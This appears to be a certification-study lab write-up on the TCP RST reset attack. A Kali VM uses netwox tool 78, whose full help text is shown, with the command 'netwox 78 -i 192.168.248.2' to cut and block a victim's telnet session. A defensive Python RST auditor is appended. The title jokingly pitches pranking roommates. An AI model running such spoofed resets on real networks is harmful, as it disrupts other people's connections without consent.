HCIE-Security: the TCP RST reset attack (suited for pranking your roommates)

The TCP RST reset attack

Attack principle

(1) A and B are in the middle of a data exchange (a TCP connection has already been established);

(2) The hacker forges a reset segment that appears to come from server B and sends it to A;

(3) When A receives this reset segment, it immediately releases the connection and clears its buffers;

(4) The hacker keeps listening for any TCP connection request sent by victim A; as soon as such a request segment is seen, the hacker immediately sends a TCP RST reset segment to victim A, so A can never reconnect to B.

Lab environment

Description:
Victim A: Ubuntu virtual machine
Server B: Metasploitable2 virtual machine
Hacker: Kali virtual machine

1. First, A must establish a TCP connection to B; here we have A telnet to B.
[Screenshot: telnet from A to B succeeds]
2. On the Kali VM (the hacker), look up netwox tool number 78 to forge a TCP RST segment and send it to A.

netwox tool number 78 is the TCP Reset spoofing tool.

kali@kali:~$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.

######################## MAIN MENU #########################
 0 - leave netwox
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + information
 b + network protocol
 c + application protocol
 d + sniff (capture network packets)
 e + spoof (create and send packets)
 f + record (file containing captured packets)
 g + client
 h + server
 i + ping (check if a computer if reachable)
 j + traceroute (obtain list of gateways)
 k + scan (computer and port discovery)
 l + network audit
 m + brute force (check if passwords are weak)
 n + remote administration
 o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b

##################### network protocol #####################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + Ethernet
 b + IP
 c + UDP
 d + TCP
 e + ICMP
 f + ARP
Select a node (key in 0123456abcdef): d

########################### TCP ############################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + TCP spoof
 b + TCP client
 c + TCP server
 d + network audit using TCP
 e + dns
 f + ftp
 g + http
 h + ident
 i + irc
 j + nntp
 k + smb
 l + smtp
 m + telnet
 n + whois
Select a node (key in 0123456abcdefghijklmn): d

################# network audit using TCP ##################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a - 76:Synflood
 b - 77:Check if seqnum are predictible
 c - 78:Reset every TCP packet
 d - 79:Acknowledge every TCP SYN
Select a node (key in 0123456abcd): c

################# help for tool number 78 ##################
Title: Reset every TCP packet
+------------------------------------------------------------------------+
| This tool resets every TCP session matching a filter. It permits to    |
| temporarily block a TCP flow without having to change firewall rules.  |
| It also permits to force a renegotiation of session parameters, in     |
| order to sniff the beginning of connection.                            |
| Parameter --device indicates on which device to sniff. Please note     |
| that under some systems, such as Windows, sniffing on some devices is  |
| not supported.                                                         |
| Parameter --filter defines the sniff filter. It permits to restrict    |
| captured packets. This kind of filter is named a BPF or pcap filter.   |
| Basic elements of a filter are:                                        |
|   host 1.2.3.4                                                         |
|   net 192.168.10                                                       |
|   net 192.168.10.0 mask 255.255.255.0                                  |
|   net 192.168.10.0/24                                                  |
|   port 21                                                              |
|   dst host 1.2.3.4                                                     |
|   src port 2345                                                        |
|   ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working)          |
|   ether src aa:bb:cc:dd:ee:ff                                          |
|   ip                                                                   |
|   arp                                                                  |
|   rarp                                                                 |
|   tcp                                                                  |
|   icmp                                                                 |
|   udp                                                                  |
| Here are filter examples:                                              |
|   "host 1.2.3.4"                                                       |
|   "net 192.168 and icmp"                                               |
|   "host 1.2.3.4 or dst port 80"                                        |
|   "(udp or tcp) and not host 1.2.3.4"                                  |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here  |
| is the list of accepted values:                                        |
|  - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
|    a firewall is installed, or on some systems, this might not work.   |
|  - 'linkf' means to spoof at link level (currently, only Ethernet is   |
|    supported). The 'f' means to Fill source Ethernet address.          |
|    However, if source IP address is spoofed, it might be impossible    |
|    to Fill it. So, linkf will not work: use linkb or linkfb instead.   |
|  - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
|    source Ethernet address (0:0:0:0:0:0, do not try to Fill it).       |
|  - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
|    source Ethernet address, but if it is not possible, it is left      |
|    Blank.                                                              |
|  - 'rawlinkf' means to try 'raw', then try 'linkf'                     |
|  - 'rawlinkb' means to try 'raw', then try 'linkb'                     |
|  - 'rawlinkfb' means to try 'raw', then try 'linkfb'                   |
|  - 'linkfraw' means to try 'linkf', then try 'raw'                     |
|  - 'linkbraw' means to try 'linkb', then try 'raw'                     |
|  - 'linkfbraw' means to try 'linkfb', then try 'raw'                   |
|  - 'link' is an alias for 'linkfb'                                     |
|  - 'rawlink' is an alias for 'rawlinkfb'                               |
|  - 'linkraw' is an alias for 'linkfbraw'                               |
|  - 'best' is an alias for 'linkraw'. It should work in all cases.      |
|                                                                        |
| This tool may need to be run with admin privilege in order to sniff    |
| and spoof.                                                             |
+------------------------------------------------------------------------+
Usage: netwox 78 [-d device] [-f filter] [-s spoofip] [-i ips]
Parameters:
 -d|--device device             device name {Eth0}
 -f|--filter filter             pcap filter
 -s|--spoofip spoofip           IP spoof initialization type {linkbraw}
 -i|--ips ips                   limit the list of IP addresses to reset {all}
Example: netwox 78
Press 'r' or 'k' to run this tool, or any other key to continue 

Attack command:

netwox 78 -i 192.168.248.2
// sends TCP RST reset segments to the host with IP address 192.168.248.2 (the -i option limits which addresses get reset)

Note:

After running this forged-packet command on the Kali VM, the terminal appears to hang. It is not actually stuck: the tool is listening for whether the host with that IP address sends any TCP connection request, and as soon as such a TCP request segment is seen, Kali immediately sends the forged TCP RST segment to that host.

3. Now look at victim A (the Ubuntu VM): the telnet session has been disconnected, and if A tries to telnet B again it also reports that it cannot connect.
Trying again: telnet to B still fails.
Capturing packets on the Ubuntu VM shows the RST reset segments sent by the hacker.
4. As soon as the attack is stopped on the Kali VM, Ubuntu (A) can telnet B again.
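As an added defender's-side example (not part of the original post), the Python below classifies captured RST segments the way an RFC 5961 compliant stack does and flags TTL anomalies; A's address is the lab's 192.168.248.2, while B's address, the ports, sequence numbers and sample packets are constructed. The RFC 5961 check alone stops blind off-path resets but not a same-LAN sniffer like netwox 78, which can copy the exact sequence number, which is why a comparison against the TTL seen from the peer during the handshake is included.

```python
import struct
RST, ACK = 0x04, 0x10
A, B = "192.168.248.2", "192.168.248.10"  # A is the lab's victim address; B's address is constructed
def build_ipv4_tcp(src, dst, sport, dport, seq, flags, ttl=64):
    """Constructed sample input: a minimal 40-byte IPv4+TCP packet, checksums left zero."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, ttl, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | flags, 8192, 0, 0)
    return ip + tcp

def parse(pkt):
    """Extract the fields a RST check needs from a raw IPv4+TCP packet (no link header)."""
    ihl = (pkt[0] & 0x0F) * 4
    sport, dport, seq, _ack, off_flags = struct.unpack("!HHIIH", pkt[ihl:ihl + 14])
    return {"src": ".".join(map(str, pkt[12:16])), "dst": ".".join(map(str, pkt[16:20])),
            "ttl": pkt[8], "sport": sport, "dport": dport, "seq": seq, "flags": off_flags & 0x1FF}

def rst_disposition(seq, rcv_nxt, rcv_wnd):
    """RFC 5961 3.2: exact RCV.NXT match resets; in-window gets a challenge ACK; else drop."""
    if seq == rcv_nxt:
        return "reset"
    if (seq - rcv_nxt) % (1 << 32) < rcv_wnd:
        return "challenge-ack"
    return "drop"

def audit_rsts(packets, conns):
    """conns: {(peer_ip, peer_port, local_ip, local_port): receive state + handshake TTL}; returns (key, verdict) per RST."""
    findings = []
    for raw in packets:
        p = parse(raw)
        if not p["flags"] & RST:
            continue
        key = (p["src"], p["sport"], p["dst"], p["dport"])
        st = conns.get(key)
        verdict = ("rst-for-unknown-connection" if st is None
                   else rst_disposition(p["seq"], st["rcv_nxt"], st["rcv_wnd"]))
        if st and p["ttl"] != st["ttl"]:  # a RST forged by a third host rarely carries the peer's TTL
            verdict += "+ttl-mismatch"
        findings.append((key, verdict))
    return findings

# A's telnet session to B as A's stack sees it: next expected sequence number from B is 1000.
CONNS = {(B, 23, A, 40000): {"rcv_nxt": 1000, "rcv_wnd": 8192, "ttl": 64}}
CAPTURE = [
    build_ipv4_tcp(B, A, 23, 40000, 1000, RST),          # genuine close by B
    build_ipv4_tcp(B, A, 23, 40000, 1500, RST),          # in-window but inexact: challenge ACK
    build_ipv4_tcp(B, A, 23, 40000, 1000, RST, ttl=63),  # exact seq, wrong TTL: on-path forgery
    build_ipv4_tcp("10.0.0.9", A, 80, 40001, 1, RST),    # RST for a session A never had
]
```

Running audit_rsts(CAPTURE, CONNS) shows that only the first packet would be honoured by an RFC 5961 stack without raising a flag; the TTL mismatch on the third is the signal to look for in a capture like the one taken on the Ubuntu VM.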

——————————————————————————————————————
Note:

Friendly advice: better not to prank your roommates with this, it burns through roommates too fast.
